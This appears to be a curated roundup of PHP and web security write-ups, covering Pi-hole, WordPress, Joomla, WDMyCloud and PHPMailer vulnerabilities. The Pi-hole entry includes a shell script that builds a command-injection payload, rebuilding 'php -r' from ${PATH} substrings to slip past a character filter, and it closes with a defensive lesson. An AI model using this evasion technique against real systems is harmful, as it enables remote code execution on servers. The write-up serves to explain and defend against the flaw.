CVE-2020-8816 – Pi-hole Remote Code Execution
Pi-hole is affected by a Remote Code Execution vulnerability. An authenticated user of the Web portal can execute arbitrary commands on the underlying server with the privileges of the local user executing the service. Exploitation of this vulnerability can be automated.
Neat trick to get around input restrictions:
Luckily for us, the PATH contains the strings “pihole” and “usr”, which in turn contain the “p”, “h” and “r” lower-case characters. Those are the only letters we need to write “php -r”.
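The trick above, reduced to a runnable demonstration. This is an added example, not the advisory's exploit code: the PATH value is constructed so that it contains "pihole" and "usr", the `pos_of`/`char_at`/`build_php_r`/`build_payload` helpers are this example's own, and it assumes that the characters `$`, `{`, `}`, `:`, `-` and space survive the input filter, which the excerpt does not say. `build_php_r` shows the letters really are all there; `build_payload` emits the equivalent bash `${PATH:offset:1}` expansions that a target shell would expand back into `php -r` without the attacker ever sending the letters p, h or r.

```shell
#!/bin/sh
# Constructed PATH (assumption): any PATH containing "pihole" and "usr" works.
EXAMPLE_PATH='/usr/local/bin:/opt/pihole'

# 1-based position of the first occurrence of $2 inside $1 (POSIX sh only).
pos_of() {
    prefix=${1%%"$2"*}
    [ "$prefix" != "$1" ] || return 1      # substring not present
    echo $(( ${#prefix} + 1 ))
}

# Single character at 1-based position $2 of string $1.
char_at() {
    printf '%s' "$1" | cut -c"$2"
}

# Reassemble "php -r" from letters found inside the given PATH string:
# 'p' and 'h' come from "pihole", 'r' from "usr".
build_php_r() {
    path=$1
    pi=$(pos_of "$path" pihole) || return 1   # position of 'p' in "pihole"
    us=$(pos_of "$path" usr)    || return 1   # position of 'u' in "usr"
    p=$(char_at "$path" "$pi")
    h=$(char_at "$path" $((pi + 2)))
    r=$(char_at "$path" $((us + 2)))
    printf '%s%s%s -%s' "$p" "$h" "$p" "$r"
}

# Emit the same command as bash ${PATH:offset:1} expansions (0-based offsets):
# the form an attacker would inject so the target shell rebuilds "php -r".
build_payload() {
    path=$1
    pi=$(pos_of "$path" pihole) || return 1
    us=$(pos_of "$path" usr)    || return 1
    p=$((pi - 1)); h=$((pi + 1)); r=$((us + 1))
    printf '${PATH:%d:1}${PATH:%d:1}${PATH:%d:1} -${PATH:%d:1}' "$p" "$h" "$p" "$r"
}

build_php_r "$EXAMPLE_PATH"; echo      # php -r
build_payload "$EXAMPLE_PATH"; echo    # ${PATH:20:1}${PATH:22:1}${PATH:20:1} -${PATH:3:1}
```

The defensive lesson is the mirror image: a character blocklist on an input that reaches a shell is not a sandbox, because the shell's own expansions can manufacture any forbidden byte from environment variables the attacker never has to type. Either the input must not reach a shell at all, or it must be validated against a strict allowlist of the exact shape expected (for a MAC address, twelve hex digits and colons) before any use.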
Security alert: pipdig insecure, DDoSing competitors
WordPress 5.1 CSRF to Remote Code Execution
An attacker can take over any WordPress site that has comments enabled by tricking an administrator of a target blog to visit a website set up by the attacker. As soon as the victim administrator visits the malicious website, a cross-site request forgery (CSRF) exploit is run against the target WordPress blog in the background, without the victim noticing. The CSRF exploit abuses multiple logic flaws and sanitization errors that when combined lead to Remote Code Execution and a full site takeover.
Ending PHP Support, and The Future Of Hack
Ultimately, we recommend that projects either migrate entirely to the Hack language, or entirely to PHP7 and the PHP runtime.
An Incomparable Event
For example, do you hate comparisons? Does writing if ($x == $y)… make your skin crawl? Don’t you just wish you could write something like compareValues($x, $y, '==') instead?
WDMyCloud Multiple Vulnerabilities
Several serious security issues were uncovered during my research. Vulnerabilities such as pre-auth remote root code execution, as well as a hardcoded backdoor admin account which can NOT be changed. The backdoor also allows for pre-auth remote root code execution on the affected device.
PAST: Platform-Agnostic Security Tokens
PAST (Platform-Agnostic Security Tokens) is a specification and reference implementation for secure stateless tokens.
Unlike JSON Web Tokens (JWT), which gives developers more than enough rope with which to hang themselves, PAST only allows secure operations. JWT gives you “algorithm agility”, PAST gives you “versioned protocols”. It’s incredibly unlikely that you’ll be able to use PAST in an insecure way.
WordPress WPDB SQL Injection
The correct fix is to ditch this whole prepare mechanism (which returns a string SQL query). Do what basically everyone else does and return a statement/query object or execute the query directly. That way you can’t double-prepare a string.
Joomla! 3.7.5 - Takeover in 20 Seconds with LDAP Injection
By using wildcard characters and by observing different authentication error messages, the attacker can literally search for login credentials progressively by sending a row of payloads that guess the credentials character by character.
php_mt_seed - PHP mt_rand() seed cracker
Plus a great collection of links and references.
Example scripts that cause segfaults in PHP
I liked this one.
A __clone() function that calls clone on the object itself, causing a recursion.
Hacking the Western Digital MyCloud NAS
I quickly found the first bug that shocked me; this bug was based on code that performed a user login check but did so using cookies or PHP session variables.
Cryptographically Secure PHP Development
While working on sodium_compat, our pure-PHP implementation of libsodium, it has come to our attention that a lot of the engineering decisions we’ve made to minimize the risk of side-channels aren’t well-known outside of our development team.
Let's Make 2017 the Year of Simply Secure PHP Cryptography
Although adding libsodium to the newest version of PHP will significantly improve the software written in 2018 and beyond, it doesn’t do a lot of good for the software that powers a third of all websites on the Internet today.
And thus, a polyfill backport.
PHPMailer < 5.2.20 Remote Code Execution (0day Patch Bypass/exploit)
The State of Wordpress Security
While many plugins do not contain vulnerabilities at all because of their small size, the ones that do have issues have a lot of them.
Plus pretty graphs.
Roundcube 1.2.2: Command Execution via Email
Shell injection via improper escaping.